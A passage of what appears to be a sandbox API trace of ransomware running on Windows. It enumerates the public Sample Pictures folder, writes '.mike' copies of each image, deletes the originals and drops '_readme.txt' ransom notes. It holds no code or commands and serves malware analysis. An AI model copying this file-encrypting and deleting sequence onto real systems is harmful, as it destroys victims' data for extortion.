dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0162.704] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2973c420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x2973c420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2a42dbc0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0162.704] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0162.705] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0162.705] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0162.705] CoTaskMemFree (pv=0x508980) [0162.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0162.705] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0162.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.706] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0162.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0162.707] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0162.708] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0162.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.708] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0162.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0162.709] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0162.709] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0162.710] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0162.710] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0162.710] CoTaskMemFree (pv=0x508980) [0162.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0162.710] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures", lpFilePart=0x0) returned 0x28 [0162.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.714] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0162.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0162.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0162.715] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0162.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0162.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg", cAlternateFileName="")) returned 1 [0162.716] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8907c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg", cAlternateFileName="LIGHTH~1.JPG")) returned 1 [0162.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbde6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg", cAlternateFileName="")) returned 1 [0162.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 1 [0162.717] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0162.718] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0162.720] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0162.721] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", lpFilePart=0x0) returned 0x3f [0162.721] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", lpFilePart=0x0) returned 0x3a [0162.842] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=655360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0xa0000 [0162.874] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", lpFilePart=0x0) returned 0x3f [0162.874] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.mike", lpFilePart=0x0) returned 0x3f [0162.875] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg", dwFileAttributes=0x80) returned 1 [0162.875] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg")) returned 1 [0162.883] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0162.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0162.893] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", lpFilePart=0x0) returned 0x38 [0162.894] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", lpFilePart=0x0) returned 0x33 [0162.959] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=573440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x8c000 [0162.992] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", lpFilePart=0x0) returned 0x38 [0162.993] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.mike", lpFilePart=0x0) returned 0x38 [0162.993] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg", dwFileAttributes=0x80) returned 1 [0162.994] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg")) returned 1 [0163.001] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.004] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.005] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", lpFilePart=0x0) returned 0x37 [0163.062] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.063] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=532480, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x82000 [0163.064] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.065] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=542720, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x84800 [0163.066] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.067] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=552960, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x87000 [0163.068] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.069] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=563200, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x89800 [0163.071] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.071] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=573440, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x8c000 [0163.073] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.074] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=583680, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x8e800 [0163.075] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.076] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=593920, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x91000 [0163.077] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.077] WriteFile (in: hFile=0x1c8, lpBuffer=0x21617b4*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21617b4*, lpNumberOfBytesWritten=0x2af0bc*=0x560, lpOverlapped=0x0) returned 1 [0163.079] WriteFile (in: hFile=0x1c8, lpBuffer=0x21649c4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21649c4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0163.080] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.080] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.mike", lpFilePart=0x0) returned 0x3c [0163.080] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", dwFileAttributes=0x80) returned 1 [0163.081] DeleteFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 1 [0163.087] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\_readme.txt", lpFilePart=0x0) returned 0x34 [0163.088] WriteFile (in: hFile=0x1c8, lpBuffer=0x2167b8c*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x2167b8c*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0163.089] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0163.090] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0163.091] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.091] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpFilePart=0x0) returned 0x36 [0163.092] WriteFile (in: hFile=0x1c8, lpBuffer=0x216b738*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x216b738*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0163.093] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0163.096] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.mike", lpFilePart=0x0) returned 0x3b [0163.097] SetFilePointer (in: hFile=0x1c8, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0163.097] GetFullPathNameW (in: 